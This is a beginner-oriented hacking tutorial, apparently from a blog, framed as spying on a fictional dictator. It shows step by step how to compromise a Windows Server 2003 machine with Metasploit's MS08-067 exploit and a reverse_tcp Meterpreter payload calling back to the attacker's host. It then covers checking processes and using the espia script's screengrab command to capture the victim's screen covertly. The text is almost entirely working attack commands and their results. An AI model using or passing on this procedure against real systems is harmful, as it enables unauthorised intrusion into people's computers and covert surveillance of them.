Hack Like a Pro: How to Remotely Grab a Screenshot of Someone's Compromised Computer

Apr 25, 2013 04:40 PM
May 26, 2016 07:26 PM

Welcome back, my newbie hackers!

We've already saved the world from nuclear annihilation and covered our tracks afterwards, but the world is still threatened by a malicious, megalomaniacal dictator with missiles and nuclear weapons.

We need to keep a close eye on him, so in this hack, we'll install a script to periodically take a screenshot of whatever he's doing on his computer. That way we can monitor his activities and hopefully keep the world safe.

635024865191110917.jpg

So, let's fire up Metasploit and get after this malignant, maniacal, and malicious dictator.

Step 1: Set Up the Hack

First , let's select an exploit to use. Since he's using a Windows Server 2003 system, I like to use the MS08_067_ netapi exploit, so let's type:

  • msf > use exploit/windows/smb/ms08_067_netapi
635024830734082397.jpg

To simplify our screen captures, we'll need to use Metasploit's Meterpreter payload. Let's load it into our exploit by:

  • msf > (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp

Next, we need to set our options. At this point, I like to use the "show options" command to see what options are necessary to run this hack.

  • msf > (ms08_067_netapi) show options
635024830852642605.jpg

As you can, we need to set the RHOST (the victim) and the LHOST (the attacker or us) IP addresses. After doing this, we should be ready to take over his system.

  • msf > (ms08_067_netapi) set RHOST 192.168.1.108
  • msf > (ms08_067_netapi) set LHOST 192.168.1.109
635024830962310798.jpg

Now, if we did everything correctly, we should be able to exploit the dictator's computer and put the Meterpreter on it, giving us total control of his computer.

  • msf > (ms08_067_netapi) exploit
635024831069014985.jpg

As you can see, we received a Meterpreter command prompt and we're ready to roll!

Step 2: Grabbing a Screenshot

Before we begin work on the malicious dictator's computer, let's find out what process ID (PID) we are using. Type:

  • meterpreter > getpid
635024831190383198.jpg

As you can see from the screenshot, we are using the PID of 932 on the dictator's computer. Now let's check to see what process that is by getting a list of all the processes with their corresponding PIDs. Type:

  • meterpreter > ps
635024831303015396.jpg

We can see that the PID of 932 corresponds to the svrhost.exe process. Since we're using a process with active desktop permissions, we're good to go. If not, we would have to migrate to a process with active desktop permissions.

Now all we need to do is activate a built-in script in Meterpreter called espia. Simply type:

  • meterpreter > use espia
635024831412371588.jpg

Running this script simply installs espia on the bad guy's computer. Now we need to grab a screenshot of his computer by typing:

  • meterpreter > screengrab

When we do this, the espia script grabs a screenshot of our dictator's computer, saves it in our root user's directory, and displays a copy for us.

635024067233953380.jpg

As we can see above, we've successfully grabbed a screenshot of our bad boy's computer. Looks like he's up to no good again, checking on those Twinkies that are enroute.

Photos by Nenetus/Shutterstock, Picsfive/Shutterstock

Comments

No Comments Exist

Be the first, drop a comment!